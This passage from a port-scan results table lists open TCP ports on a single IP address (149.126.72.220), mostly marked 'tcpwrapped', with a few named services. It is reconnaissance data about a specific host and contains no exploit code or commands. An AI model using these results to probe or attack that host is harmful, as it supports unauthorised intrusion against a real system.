9238149.126.72.220 3160 tcp tcpwrapped open
9239149.126.72.220 3165 tcp tcpwrapped open
9240149.126.72.220 3270 tcp tcpwrapped open
9241149.126.72.220 3299 tcp tcpwrapped open
9242149.126.72.220 3306 tcp tcpwrapped open
9243149.126.72.220 3333 tcp tcpwrapped open
9244149.126.72.220 3389 tcp tcpwrapped open
9245149.126.72.220 3391 tcp tcpwrapped open
9246149.126.72.220 3400 tcp tcpwrapped open
9247149.126.72.220 3401 tcp tcpwrapped open
9248149.126.72.220 3402 tcp tcpwrapped open
9249149.126.72.220 3403 tcp tcpwrapped open
9250149.126.72.220 3404 tcp tcpwrapped open
9251149.126.72.220 3405 tcp tcpwrapped open
9252149.126.72.220 3406 tcp tcpwrapped open
9253149.126.72.220 3407 tcp tcpwrapped open
9254149.126.72.220 3408 tcp tcpwrapped open
9255149.126.72.220 3409 tcp tcpwrapped open
9256149.126.72.220 3410 tcp tcpwrapped open
9257149.126.72.220 3412 tcp tcpwrapped open
9258149.126.72.220 3443 tcp tcpwrapped open
9259149.126.72.220 3500 tcp tcpwrapped open
9260149.126.72.220 3510 tcp tcpwrapped open
9261149.126.72.220 3521 tcp tcpwrapped open
9262149.126.72.220 3522 tcp tcpwrapped open
9263149.126.72.220 3523 tcp tcpwrapped open
9264149.126.72.220 3524 tcp tcpwrapped open
9265149.126.72.220 3530 tcp tcpwrapped open
9266149.126.72.220 3531 tcp tcpwrapped open
9267149.126.72.220 3540 tcp tcpwrapped open
9268149.126.72.220 3548 tcp tcpwrapped open
9269149.126.72.220 3549 tcp tcpwrapped open
9270149.126.72.220 3550 tcp tcpwrapped open
9271149.126.72.220 3551 tcp tcpwrapped open
9272149.126.72.220 3552 tcp tcpwrapped open
9273149.126.72.220 3553 tcp tcpwrapped open
9274149.126.72.220 3554 tcp tcpwrapped open
9275149.126.72.220 3555 tcp tcpwrapped open
9276149.126.72.220 3556 tcp tcpwrapped open
9277149.126.72.220 3557 tcp tcpwrapped open
9278149.126.72.220 3558 tcp tcpwrapped open
9279149.126.72.220 3559 tcp tcpwrapped open
9280149.126.72.220 3560 tcp tcpwrapped open
9281149.126.72.220 3561 tcp tcpwrapped open
9282149.126.72.220 3562 tcp tcpwrapped open
9283149.126.72.220 3563 tcp tcpwrapped open
9284149.126.72.220 3566 tcp tcpwrapped open
9285149.126.72.220 3567 tcp tcpwrapped open
9286149.126.72.220 3568 tcp tcpwrapped open
9287149.126.72.220 3569 tcp tcpwrapped open
9288149.126.72.220 3570 tcp tcpwrapped open
9289149.126.72.220 3572 tcp tcpwrapped open
9290149.126.72.220 3580 tcp tcpwrapped open
9291149.126.72.220 3590 tcp tcpwrapped open
9292149.126.72.220 3790 tcp tcpwrapped open
9293149.126.72.220 3791 tcp tcpwrapped open
9294149.126.72.220 3792 tcp tcpwrapped open
9295149.126.72.220 3793 tcp tcpwrapped open
9296149.126.72.220 3794 tcp tcpwrapped open
9297149.126.72.220 3838 tcp tcpwrapped open
9298149.126.72.220 3841 tcp tcpwrapped open
9299149.126.72.220 3842 tcp tcpwrapped open
9300149.126.72.220 3950 tcp tcpwrapped open
9301149.126.72.220 3951 tcp tcpwrapped open
9302149.126.72.220 3952 tcp tcpwrapped open
9303149.126.72.220 3953 tcp tcpwrapped open
9304149.126.72.220 3954 tcp adrep open
9305149.126.72.220 4000 tcp tcpwrapped open
9306149.126.72.220 4001 tcp newoak open
9307149.126.72.220 4002 tcp mlchat-proxy open
9308149.126.72.220 4021 tcp nexus-portal open
9309149.126.72.220 4022 tcp dnox open
9310149.126.72.220 4023 tcp esnm-zoning open
9311149.126.72.220 4043 tcp nirp open
9312149.126.72.220 4072 tcp zieto-sock open
9313149.126.72.220 4080 tcp lorica-in open
9314149.126.72.220 4085 tcp ezmessagesrv open
9315149.126.72.220 4120 tcp minirem open
9316149.126.72.220 4147 tcp vrxpservman open
9317149.126.72.220 4148 tcp hhb-handheld open
9318149.126.72.220 4150 tcp poweralert-nsa open
9319149.126.72.220 4155 tcp bzr open
9320149.126.72.220 4160 tcp jini-discovery open
9321149.126.72.220 4165 tcp altcp open
9322149.126.72.220 4172 tcp pcoip open
9323149.126.72.220 4243 tcp vrml-multi-use open
9324149.126.72.220 4244 tcp vrml-multi-use open
9325149.126.72.220 4250 tcp vrml-multi-use open
9326149.126.72.220 4300 tcp corelccam open
9327149.126.72.220 4333 tcp msql open
9328149.126.72.220 4343 tcp unicall open
9329149.126.72.220 4344 tcp vinainstall open
9330149.126.72.220 4400 tcp ds-srv open
9331149.126.72.220 4401 tcp tcpwrapped open
9332149.126.72.220 4402 tcp tcpwrapped open
9333149.126.72.220 4430 tcp tcpwrapped open
9334149.126.72.220 4431 tcp tcpwrapped open
9335149.126.72.220 4432 tcp tcpwrapped open
9336149.126.72.220 4434 tcp tcpwrapped open
9337149.126.72.220 4435 tcp tcpwrapped open
9338149.126.72.220 4436 tcp tcpwrapped open
9339149.126.72.220 4437 tcp tcpwrapped open
9340149.126.72.220 4439 tcp tcpwrapped open
9341149.126.72.220 4440 tcp tcpwrapped open
9342149.126.72.220 4443 tcp tcpwrapped open
9343149.126.72.220 4444 tcp tcpwrapped open
9344149.126.72.220 4445 tcp tcpwrapped open
9345149.126.72.220 4451 tcp tcpwrapped open
9346149.126.72.220 4455 tcp tcpwrapped open
9347149.126.72.220 4457 tcp tcpwrapped open
9348149.126.72.220 4459 tcp tcpwrapped open
9349149.126.72.220 4461 tcp tcpwrapped open
9350149.126.72.220 4463 tcp tcpwrapped open
9351149.126.72.220 4477 tcp tcpwrapped open
9352149.126.72.220 4482 tcp tcpwrapped open
9353149.126.72.220 4500 tcp tcpwrapped open
9354149.126.72.220 4502 tcp tcpwrapped open
9355149.126.72.220 4505 tcp tcpwrapped open
9356149.126.72.220 4572 tcp tcpwrapped open
9357149.126.72.220 4602 tcp tcpwrapped open
9358149.126.72.220 4620 tcp tcpwrapped open
9359149.126.72.220 4643 tcp tcpwrapped open
9360149.126.72.220 4848 tcp tcpwrapped open
9361149.126.72.220 4933 tcp tcpwrapped open
9362149.126.72.220 4993 tcp tcpwrapped open
9363149.126.72.220 5000 tcp tcpwrapped open
9364149.126.72.220 5001 tcp tcpwrapped open
9365149.126.72.220 5002 tcp tcpwrapped open
9366149.126.72.220 5003 tcp tcpwrapped open
9367149.126.72.220 5004 tcp tcpwrapped open
9368149.126.72.220 5005 tcp tcpwrapped open
9369149.126.72.220 5006 tcp tcpwrapped open
9370149.126.72.220 5007 tcp tcpwrapped open
9371149.126.72.220 5008 tcp tcpwrapped open
9372149.126.72.220 5009 tcp tcpwrapped open
9373149.126.72.220 5010 tcp tcpwrapped open
9374149.126.72.220 5011 tcp tcpwrapped open
9375149.126.72.220 5022 tcp tcpwrapped open
9376149.126.72.220 5050 tcp tcpwrapped open
9377149.126.72.220 5053 tcp tcpwrapped open
9378149.126.72.220 5060 tcp tcpwrapped open
9379149.126.72.220 5061 tcp tcpwrapped open
9380149.126.72.220 5080 tcp tcpwrapped open
9381149.126.72.220 5083 tcp tcpwrapped open
9382149.126.72.220 5089 tcp tcpwrapped open
9383149.126.72.220 5090 tcp tcpwrapped open
9384149.126.72.220 5100 tcp tcpwrapped open
9385149.126.72.220 5105 tcp tcpwrapped open
9386149.126.72.220 5119 tcp tcpwrapped open
9387149.126.72.220 5120 tcp tcpwrapped open
9388149.126.72.220 5130 tcp tcpwrapped open
9389149.126.72.220 5140 tcp tcpwrapped open
9390149.126.72.220 5150 tcp tcpwrapped open
9391149.126.72.220 5160 tcp tcpwrapped open
9392149.126.72.220 5180 tcp tcpwrapped open
9393149.126.72.220 5201 tcp tcpwrapped open
9394149.126.72.220 5222 tcp tcpwrapped open
9395149.126.72.220 5223 tcp tcpwrapped open
9396149.126.72.220 5224 tcp tcpwrapped open
9397149.126.72.220 5225 tcp tcpwrapped open
9398149.126.72.220 5226 tcp tcpwrapped open
9399149.126.72.220 5227 tcp tcpwrapped open
9400149.126.72.220 5228 tcp tcpwrapped open
9401149.126.72.220 5229 tcp tcpwrapped open
9402149.126.72.220 5230 tcp tcpwrapped open
9403149.126.72.220 5231 tcp tcpwrapped open
9404149.126.72.220 5232 tcp tcpwrapped open
9405149.126.72.220 5233 tcp tcpwrapped open
9406149.126.72.220 5234 tcp tcpwrapped open
9407149.126.72.220 5235 tcp tcpwrapped open
9408149.126.72.220 5236 tcp tcpwrapped open
9409149.126.72.220 5237 tcp tcpwrapped open
9410149.126.72.220 5238 tcp tcpwrapped open
9411149.126.72.220 5239 tcp tcpwrapped open
9412149.126.72.220 5240 tcp tcpwrapped open
9413149.126.72.220 5241 tcp tcpwrapped open
9414149.126.72.220 5242 tcp tcpwrapped open
9415149.126.72.220 5243 tcp tcpwrapped open
9416149.126.72.220 5244 tcp tcpwrapped open
9417149.126.72.220 5245 tcp tcpwrapped open
9418149.126.72.220 5246 tcp tcpwrapped open
9419149.126.72.220 5247 tcp tcpwrapped open
9420149.126.72.220 5248 tcp tcpwrapped open
9421149.126.72.220 5249 tcp tcpwrapped open
9422149.126.72.220 5250 tcp tcpwrapped open
9423149.126.72.220 5251 tcp tcpwrapped open
9424149.126.72.220 5252 tcp tcpwrapped open
9425149.126.72.220 5253 tcp tcpwrapped open
9426149.126.72.220 5254 tcp tcpwrapped open
9427149.126.72.220 5255 tcp tcpwrapped open
9428149.126.72.220 5256 tcp tcpwrapped open
9429149.126.72.220 5257 tcp tcpwrapped open
9430149.126.72.220 5258 tcp tcpwrapped open
9431149.126.72.220 5259 tcp tcpwrapped open
9432149.126.72.220 5260 tcp tcpwrapped open
9433149.126.72.220 5261 tcp tcpwrapped open
9434149.126.72.220 5262 tcp tcpwrapped open
9435149.126.72.220 5263 tcp tcpwrapped open
9436149.126.72.220 5264 tcp tcpwrapped open
9437149.126.72.220 5265 tcp tcpwrapped open
9438149.126.72.220 5266 tcp tcpwrapped open
9439149.126.72.220 5267 tcp tcpwrapped open
9440149.126.72.220 5268 tcp tcpwrapped open
9441149.126.72.220 5269 tcp tcpwrapped open
9442149.126.72.220 5270 tcp tcpwrapped open
9443149.126.72.220 5271 tcp tcpwrapped open
9444149.126.72.220 5272 tcp tcpwrapped open
9445149.126.72.220 5273 tcp tcpwrapped open
9446149.126.72.220 5274 tcp tcpwrapped open
9447149.126.72.220 5275 tcp tcpwrapped open
9448149.126.72.220 5276 tcp tcpwrapped open
9449149.126.72.220 5277 tcp tcpwrapped open
9450149.126.72.220 5278 tcp tcpwrapped open
9451149.126.72.220 5279 tcp tcpwrapped open
9452149.126.72.220 5280 tcp tcpwrapped open
9453149.126.72.220 5440 tcp tcpwrapped open
9454149.126.72.220 5443 tcp tcpwrapped open
9455149.126.72.220 5456 tcp tcpwrapped open
9456149.126.72.220 5494 tcp tcpwrapped open
9457149.126.72.220 5495 tcp tcpwrapped open
9458149.126.72.220 5500 tcp tcpwrapped open
9459149.126.72.220 5503 tcp tcpwrapped open
9460149.126.72.220 5552 tcp tcpwrapped open
9461149.126.72.220 5555 tcp tcpwrapped open
9462149.126.72.220 5556 tcp tcpwrapped open
9463149.126.72.220 5557 tcp tcpwrapped open
9464149.126.72.220 5567 tcp tcpwrapped open
9465149.126.72.220 5568 tcp tcpwrapped open
9466149.126.72.220 5569 tcp tcpwrapped open
9467149.126.72.220 5590 tcp tcpwrapped open
9468149.126.72.220 5591 tcp tcpwrapped open
9469149.126.72.220 5592 tcp tcpwrapped open
9470149.126.72.220 5593 tcp tcpwrapped open
9471149.126.72.220 5594 tcp tcpwrapped open
9472149.126.72.220 5595 tcp tcpwrapped open
9473149.126.72.220 5596 tcp tcpwrapped open
9474149.126.72.220 5597 tcp tcpwrapped open
9475149.126.72.220 5598 tcp tcpwrapped open
9476149.126.72.220 5599 tcp tcpwrapped open
9477149.126.72.220 5600 tcp tcpwrapped open
9478149.126.72.220 5601 tcp tcpwrapped open
9479149.126.72.220 5602 tcp tcpwrapped open
9480149.126.72.220 5603 tcp tcpwrapped open
9481149.126.72.220 5604 tcp tcpwrapped open
9482149.126.72.220 5605 tcp tcpwrapped open
9483149.126.72.220 5606 tcp tcpwrapped open
9484149.126.72.220 5607 tcp tcpwrapped open
9485149.126.72.220 5608 tcp tcpwrapped open
9486149.126.72.220 5609 tcp tcpwrapped open
9487149.126.72.220 5613 tcp tcpwrapped open
9488149.126.72.220 5614 tcp tcpwrapped open
9489149.126.72.220 5620 tcp tcpwrapped open
9490149.126.72.220 5630 tcp tcpwrapped open
9491149.126.72.220 5640 tcp tcpwrapped open
9492149.126.72.220 5650 tcp tcpwrapped open
9493149.126.72.220 5660 tcp tcpwrapped open
9494149.126.72.220 5671 tcp tcpwrapped open
9495149.126.72.220 5672 tcp tcpwrapped open
9496149.126.72.220 5673 tcp tcpwrapped open
9497149.126.72.220 5680 tcp tcpwrapped open
9498149.126.72.220 5696 tcp tcpwrapped open
9499149.126.72.220 5698 tcp tcpwrapped open
9500149.126.72.220 5701 tcp tcpwrapped open
9501149.126.72.220 5721 tcp tcpwrapped open
9502149.126.72.220 5900 tcp tcpwrapped open
9503149.126.72.220 5901 tcp tcpwrapped open
9504149.126.72.220 5902 tcp tcpwrapped open
9505149.126.72.220 5903 tcp tcpwrapped open
9506149.126.72.220 5904 tcp tcpwrapped open
9507149.126.72.220 5905 tcp tcpwrapped open
9508149.126.72.220 5906 tcp tcpwrapped open
9509149.126.72.220 5907 tcp tcpwrapped open
9510149.126.72.220 5908 tcp tcpwrapped open
9511149.126.72.220 5909 tcp tcpwrapped open
9512149.126.72.220 5910 tcp tcpwrapped open
9513149.126.72.220 5911 tcp tcpwrapped open
9514149.126.72.220 5912 tcp tcpwrapped open
9515149.126.72.220 5913 tcp tcpwrapped open
9516149.126.72.220 5914 tcp tcpwrapped open
9517149.126.72.220 5915 tcp tcpwrapped open
9518149.126.72.220 5916 tcp tcpwrapped open
9519149.126.72.220 5917 tcp tcpwrapped open
9520149.126.72.220 5918 tcp tcpwrapped open
9521149.126.72.220 5919 tcp tcpwrapped open
9522149.126.72.220 5920 tcp tcpwrapped open
9523149.126.72.220 5984 tcp tcpwrapped open
9524149.126.72.220 5985 tcp tcpwrapped open
9525149.126.72.220 5986 tcp tcpwrapped open
9526149.126.72.220 5987 tcp tcpwrapped open
9527149.126.72.220 5988 tcp tcpwrapped open
9528149.126.72.220 5989 tcp tcpwrapped open
9529149.126.72.220 5990 tcp tcpwrapped open
9530149.126.72.220 5991 tcp tcpwrapped open
9531149.126.72.220 5992 tcp tcpwrapped open
9532149.126.72.220 5993 tcp tcpwrapped open
9533149.126.72.220 5994 tcp tcpwrapped open
9534149.126.72.220 5995 tcp tcpwrapped open
9535149.126.72.220 5996 tcp tcpwrapped open
9536149.126.72.220 5997 tcp tcpwrapped open
9537149.126.72.220 5998 tcp tcpwrapped open
9538149.126.72.220 5999 tcp tcpwrapped open
9539149.126.72.220 6000 tcp tcpwrapped open
9540149.126.72.220 6001 tcp tcpwrapped open
9541149.126.72.220 6002 tcp tcpwrapped open
9542149.126.72.220 6003 tcp tcpwrapped open
9543149.126.72.220 6004 tcp tcpwrapped open
9544149.126.72.220 6005 tcp tcpwrapped open
9545149.126.72.220 6006 tcp tcpwrapped open
9546149.126.72.220 6007 tcp tcpwrapped open
9547149.126.72.220 6008 tcp tcpwrapped open
9548149.126.72.220 6009 tcp tcpwrapped open
9549149.126.72.220 6010 tcp tcpwrapped open
9550149.126.72.220 6011 tcp tcpwrapped open
9551149.126.72.220 6021 tcp tcpwrapped open
9552149.126.72.220 6060 tcp tcpwrapped open
9553149.126.72.220 6061 tcp tcpwrapped open
9554149.126.72.220 6081 tcp tcpwrapped open
9555149.126.72.220 6100 tcp tcpwrapped open
9556149.126.72.220 6102 tcp tcpwrapped open
9557149.126.72.220 6134 tcp tcpwrapped open
9558149.126.72.220 6161 tcp tcpwrapped open
9559149.126.72.220 6331 tcp tcpwrapped open
9560149.126.72.220 6348 tcp tcpwrapped open
9561149.126.72.220 6379 tcp tcpwrapped open
9562149.126.72.220 6380 tcp tcpwrapped open
9563149.126.72.220 6433 tcp tcpwrapped open
9564149.126.72.220 6440 tcp tcpwrapped open
9565149.126.72.220 6443 tcp tcpwrapped open
9566149.126.72.220 6488 tcp tcpwrapped open
9567149.126.72.220 6500 tcp tcpwrapped open
9568149.126.72.220 6505 tcp tcpwrapped open
9569149.126.72.220 6510 tcp tcpwrapped open
9570149.126.72.220 6511 tcp tcpwrapped open
9571149.126.72.220 6512 tcp tcpwrapped open
9572149.126.72.220 6514 tcp tcpwrapped open
9573149.126.72.220 6543 tcp tcpwrapped open
9574149.126.72.220 6544 tcp tcpwrapped open
9575149.126.72.220 6560 tcp tcpwrapped open
9576149.126.72.220 6561 tcp tcpwrapped open
9577149.126.72.220 6565 tcp tcpwrapped open
9578149.126.72.220 6580 tcp tcpwrapped open
9579149.126.72.220 6581 tcp tcpwrapped open
9580149.126.72.220 6590 tcp tcpwrapped open
9581149.126.72.220 6601 tcp tcpwrapped open
9582149.126.72.220 6603 tcp tcpwrapped open
9583149.126.72.220 6605 tcp tcpwrapped open
9584149.126.72.220 6661 tcp tcpwrapped open
9585149.126.72.220 6662 tcp tcpwrapped open
9586149.126.72.220 6666 tcp tcpwrapped open
9587149.126.72.220 6686 tcp tcpwrapped open
9588149.126.72.220 6688 tcp tcpwrapped open
9589149.126.72.220 6700 tcp tcpwrapped open
9590149.126.72.220 6755 tcp tcpwrapped open
9591149.126.72.220 6775 tcp tcpwrapped open
9592149.126.72.220 6779 tcp tcpwrapped open
9593149.126.72.220 6789 tcp tcpwrapped open
9594149.126.72.220 6799 tcp tcpwrapped open
9595149.126.72.220 7000 tcp tcpwrapped open
9596149.126.72.220 7001 tcp tcpwrapped open
9597149.126.72.220 7002 tcp tcpwrapped open
9598149.126.72.220 7003 tcp tcpwrapped open
9599149.126.72.220 7004 tcp tcpwrapped open
9600149.126.72.220 7005 tcp tcpwrapped open
9601149.126.72.220 7007 tcp tcpwrapped open
9602149.126.72.220 7010 tcp tcpwrapped open
9603149.126.72.220 7011 tcp tcpwrapped open
9604149.126.72.220 7021 tcp tcpwrapped open
9605149.126.72.220 7070 tcp tcpwrapped open
9606149.126.72.220 7071 tcp tcpwrapped open
9607149.126.72.220 7079 tcp tcpwrapped open
9608149.126.72.220 7080 tcp tcpwrapped open
9609149.126.72.220 7081 tcp tcpwrapped open
9610149.126.72.220 7082 tcp tcpwrapped open
9611149.126.72.220 7083 tcp tcpwrapped open
9612149.126.72.220 7084 tcp tcpwrapped open
9613149.126.72.220 7085 tcp tcpwrapped open
9614149.126.72.220 7086 tcp tcpwrapped open
9615149.126.72.220 7087 tcp tcpwrapped open
9616149.126.72.220 7088 tcp tcpwrapped open
9617149.126.72.220 7090 tcp tcpwrapped open
9618149.126.72.220 7171 tcp tcpwrapped open
9619149.126.72.220 7172 tcp tcpwrapped open
9620149.126.72.220 7272 tcp tcpwrapped open
9621149.126.72.220 7348 tcp tcpwrapped open
9622149.126.72.220 7403 tcp tcpwrapped open
9623149.126.72.220 7433 tcp tcpwrapped open
9624149.126.72.220 7441 tcp tcpwrapped open
9625149.126.72.220 7443 tcp tcpwrapped open
9626149.126.72.220 7444 tcp tcpwrapped open
9627149.126.72.220 7445 tcp tcpwrapped open
9628149.126.72.220 7473 tcp tcpwrapped open
9629149.126.72.220 7500 tcp tcpwrapped open
9630149.126.72.220 7537 tcp tcpwrapped open
9631149.126.72.220 7687 tcp tcpwrapped open
9632149.126.72.220 7700 tcp tcpwrapped open
9633149.126.72.220 7771 tcp tcpwrapped open
9634149.126.72.220 7773 tcp tcpwrapped open
9635149.126.72.220 7774 tcp tcpwrapped open
9636149.126.72.220 7775 tcp tcpwrapped open
9637149.126.72.220 7776 tcp tcpwrapped open
9638149.126.72.220 7777 tcp tcpwrapped open
9639149.126.72.220 7778 tcp tcpwrapped open
9640149.126.72.220 7779 tcp tcpwrapped open
9641149.126.72.220 7788 tcp tcpwrapped open
9642149.126.72.220 7799 tcp tcpwrapped open
9643149.126.72.220 7998 tcp tcpwrapped open
9644149.126.72.220 7999 tcp tcpwrapped open
9645149.126.72.220 8000 tcp tcpwrapped open
9646149.126.72.220 8001 tcp tcpwrapped open
9647149.126.72.220 8002 tcp tcpwrapped open
9648149.126.72.220 8003 tcp tcpwrapped open
9649149.126.72.220 8004 tcp tcpwrapped open
9650149.126.72.220 8005 tcp tcpwrapped open
9651149.126.72.220 8006 tcp tcpwrapped open
9652149.126.72.220 8007 tcp tcpwrapped open
9653149.126.72.220 8008 tcp tcpwrapped open
9654149.126.72.220 8009 tcp tcpwrapped open
9655149.126.72.220 8010 tcp tcpwrapped open
9656149.126.72.220 8011 tcp tcpwrapped open
9657149.126.72.220 8012 tcp tcpwrapped open
9658149.126.72.220 8013 tcp tcpwrapped open
9659149.126.72.220 8014 tcp tcpwrapped open
9660149.126.72.220 8015 tcp tcpwrapped open
9661149.126.72.220 8016 tcp tcpwrapped open
9662149.126.72.220 8017 tcp tcpwrapped open
9663149.126.72.220 8018 tcp tcpwrapped open
9664149.126.72.220 8019 tcp tcpwrapped open
9665149.126.72.220 8020 tcp tcpwrapped open
9666149.126.72.220 8021 tcp tcpwrapped open
9667149.126.72.220 8022 tcp tcpwrapped open
9668149.126.72.220 8023 tcp tcpwrapped open
9669149.126.72.220 8024 tcp tcpwrapped open
9670149.126.72.220 8025 tcp tcpwrapped open
9671149.126.72.220 8026 tcp tcpwrapped open
9672149.126.72.220 8027 tcp tcpwrapped open
9673149.126.72.220 8028 tcp tcpwrapped open
9674149.126.72.220 8029 tcp tcpwrapped open
9675149.126.72.220 8030 tcp tcpwrapped open
9676149.126.72.220 8031 tcp tcpwrapped open
9677149.126.72.220 8032 tcp tcpwrapped open
9678149.126.72.220 8033 tcp tcpwrapped open
9679149.126.72.220 8034 tcp tcpwrapped open
9680149.126.72.220 8035 tcp tcpwrapped open
9681149.126.72.220 8036 tcp tcpwrapped open
9682149.126.72.220 8037 tcp tcpwrapped open
9683149.126.72.220 8038 tcp tcpwrapped open
9684149.126.72.220 8039 tcp tcpwrapped open
9685149.126.72.220 8040 tcp tcpwrapped open
9686149.126.72.220 8041 tcp tcpwrapped open
9687149.126.72.220 8042 tcp tcpwrapped open
9688149.126.72.220 8043 tcp tcpwrapped open
9689149.126.72.220 8044 tcp tcpwrapped open
9690149.126.72.220 8045 tcp tcpwrapped open
9691149.126.72.220 8046 tcp tcpwrapped open
9692149.126.72.220 8047 tcp tcpwrapped open
9693149.126.72.220 8048 tcp tcpwrapped open
9694149.126.72.220 8049 tcp tcpwrapped open
9695149.126.72.220 8050 tcp tcpwrapped open
9696149.126.72.220 8051 tcp tcpwrapped open
9697149.126.72.220 8052 tcp tcpwrapped open
9698149.126.72.220 8053 tcp tcpwrapped open
9699149.126.72.220 8054 tcp tcpwrapped open
9700149.126.72.220 8055 tcp tcpwrapped open
9701149.126.72.220 8056 tcp tcpwrapped open
9702149.126.72.220 8057 tcp tcpwrapped open
9703149.126.72.220 8058 tcp tcpwrapped open
9704149.126.72.220 8060 tcp tcpwrapped open
9705149.126.72.220 8064 tcp tcpwrapped open
9706149.126.72.220 8065 tcp tcpwrapped open
9707149.126.72.220 8069 tcp tcpwrapped open
9708149.126.72.220 8070 tcp tcpwrapped open
9709149.126.72.220 8071 tcp tcpwrapped open
9710149.126.72.220 8072 tcp tcpwrapped open
9711149.126.72.220 8074 tcp tcpwrapped open
9712149.126.72.220 8079 tcp tcpwrapped open
9713149.126.72.220 8080 tcp tcpwrapped open
9714149.126.72.220 8081 tcp tcpwrapped open
9715149.126.72.220 8082 tcp tcpwrapped open
9716149.126.72.220 8083 tcp tcpwrapped open
9717149.126.72.220 8084 tcp tcpwrapped open
9718149.126.72.220 8085 tcp tcpwrapped open
9719149.126.72.220 8086 tcp tcpwrapped open
9720149.126.72.220 8087 tcp tcpwrapped open
9721149.126.72.220 8088 tcp tcpwrapped open
9722149.126.72.220 8089 tcp tcpwrapped open
9723149.126.72.220 8090 tcp tcpwrapped open
9724149.126.72.220 8091 tcp tcpwrapped open
9725149.126.72.220 8092 tcp tcpwrapped open
9726149.126.72.220 8093 tcp tcpwrapped open
9727149.126.72.220 8094 tcp tcpwrapped open
9728149.126.72.220 8095 tcp tcpwrapped open
9729149.126.72.220 8096 tcp tcpwrapped open
9730149.126.72.220 8097 tcp tcpwrapped open
9731149.126.72.220 8098 tcp tcpwrapped open
9732149.126.72.220 8099 tcp tcpwrapped open
9733149.126.72.220 8100 tcp tcpwrapped open
9734149.126.72.220 8101 tcp tcpwrapped open
9735149.126.72.220 8102 tcp tcpwrapped open
9736149.126.72.220 8103 tcp tcpwrapped open
9737149.126.72.220 8104 tcp tcpwrapped open
9738149.126.72.220 8105 tcp tcpwrapped open
9739149.126.72.220 8106 tcp tcpwrapped open
9740149.126.72.220 8107 tcp tcpwrapped open
9741149.126.72.220 8108 tcp tcpwrapped open
9742149.126.72.220 8109 tcp tcpwrapped open
9743149.126.72.220 8110 tcp tcpwrapped open
9744149.126.72.220 8113 tcp tcpwrapped open
9745149.126.72.220 8114 tcp tcpwrapped open
9746149.126.72.220 8115 tcp tcpwrapped open
9747149.126.72.220 8118 tcp tcpwrapped open
9748149.126.72.220 8119 tcp tcpwrapped open
9749149.126.72.220 8120 tcp tcpwrapped open
9750149.126.72.220 8121 tcp tcpwrapped open
9751149.126.72.220 8123 tcp tcpwrapped open
9752149.126.72.220 8125 tcp tcpwrapped open
9753149.126.72.220 8126 tcp tcpwrapped open
9754149.126.72.220 8128 tcp tcpwrapped open
9755149.126.72.220 8129 tcp tcpwrapped open
9756149.126.72.220 8130 tcp tcpwrapped open
9757149.126.72.220 8131 tcp tcpwrapped open
9758149.126.72.220 8132 tcp tcpwrapped open
9759149.126.72.220 8133 tcp tcpwrapped open
9760149.126.72.220 8136 tcp tcpwrapped open
9761149.126.72.220 8140 tcp tcpwrapped open
9762149.126.72.220 8142 tcp tcpwrapped open
9763149.126.72.220 8143 tcp tcpwrapped open
9764149.126.72.220 8144 tcp tcpwrapped open
9765149.126.72.220 8147 tcp tcpwrapped open
9766149.126.72.220 8148 tcp tcpwrapped open
9767149.126.72.220 8149 tcp tcpwrapped open
9768149.126.72.220 8150 tcp tcpwrapped open
9769149.126.72.220 8154 tcp tcpwrapped open
9770149.126.72.220 8156 tcp tcpwrapped open
9771149.126.72.220 8157 tcp tcpwrapped open
9772149.126.72.220 8158 tcp tcpwrapped open
9773149.126.72.220 8160 tcp tcpwrapped open
9774149.126.72.220 8161 tcp tcpwrapped open
9775149.126.72.220 8162 tcp tcpwrapped open
9776149.126.72.220 8163 tcp tcpwrapped open
9777149.126.72.220 8164 tcp tcpwrapped open
9778149.126.72.220 8165 tcp tcpwrapped open
9779149.126.72.220 8166 tcp tcpwrapped open
9780149.126.72.220 8167 tcp tcpwrapped open
9781149.126.72.220 8168 tcp tcpwrapped open
9782149.126.72.220 8169 tcp tcpwrapped open
9783149.126.72.220 8170 tcp tcpwrapped open
9784149.126.72.220 8171 tcp tcpwrapped open
9785149.126.72.220 8172 tcp tcpwrapped open
9786149.126.72.220 8173 tcp tcpwrapped open
9787149.126.72.220 8175 tcp tcpwrapped open
9788149.126.72.220 8176 tcp tcpwrapped open
9789149.126.72.220 8178 tcp tcpwrapped open
9790149.126.72.220 8179 tcp tcpwrapped open
9791149.126.72.220 8180 tcp tcpwrapped open
9792149.126.72.220 8181 tcp tcpwrapped open
9793149.126.72.220 8182 tcp tcpwrapped open
9794149.126.72.220 8183 tcp tcpwrapped open
9795149.126.72.220 8184 tcp tcpwrapped open
9796149.126.72.220 8185 tcp tcpwrapped open
9797149.126.72.220 8186 tcp tcpwrapped open
9798149.126.72.220 8187 tcp tcpwrapped open
9799149.126.72.220 8188 tcp tcpwrapped open
9800149.126.72.220 8189 tcp tcpwrapped open
9801149.126.72.220 8190 tcp tcpwrapped open
9802149.126.72.220 8191 tcp tcpwrapped open
9803149.126.72.220 8192 tcp tcpwrapped open
9804149.126.72.220 8193 tcp tcpwrapped open
9805149.126.72.220 8194 tcp tcpwrapped open
9806149.126.72.220 8195 tcp tcpwrapped open
9807149.126.72.220 8198 tcp tcpwrapped open
9808149.126.72.220 8199 tcp tcpwrapped open
9809149.126.72.220 8200 tcp tcpwrapped open
9810149.126.72.220 8203 tcp tcpwrapped open
9811149.126.72.220 8222 tcp tcpwrapped open
9812149.126.72.220 8230 tcp tcpwrapped open
9813149.126.72.220 8236 tcp tcpwrapped open
9814149.126.72.220 8237 tcp tcpwrapped open
9815149.126.72.220 8238 tcp tcpwrapped open
9816149.126.72.220 8239 tcp tcpwrapped open
9817149.126.72.220 8241 tcp tcpwrapped open
9818149.126.72.220 8243 tcp tcpwrapped open
9819149.126.72.220 8248 tcp tcpwrapped open
9820149.126.72.220 8249 tcp tcpwrapped open
9821149.126.72.220 8250 tcp tcpwrapped open
9822149.126.72.220 8251 tcp tcpwrapped open
9823149.126.72.220 8252 tcp tcpwrapped open
9824149.126.72.220 8280 tcp tcpwrapped open
9825149.126.72.220 8282 tcp tcpwrapped open
9826149.126.72.220 8333 tcp tcpwrapped open
9827149.126.72.220 8340 tcp tcpwrapped open
9828149.126.72.220 8343 tcp tcpwrapped open
9829149.126.72.220 8350 tcp tcpwrapped open
9830149.126.72.220 8381 tcp tcpwrapped open
9831149.126.72.220 8382 tcp tcpwrapped open
9832149.126.72.220 8383 tcp tcpwrapped open
9833149.126.72.220 8384 tcp tcpwrapped open
9834149.126.72.220 8385 tcp tcpwrapped open
9835149.126.72.220 8388 tcp tcpwrapped open
9836149.126.72.220 8393 tcp tcpwrapped open
9837149.126.72.220 8401 tcp tcpwrapped open
9838149.126.72.220 8402 tcp tcpwrapped open
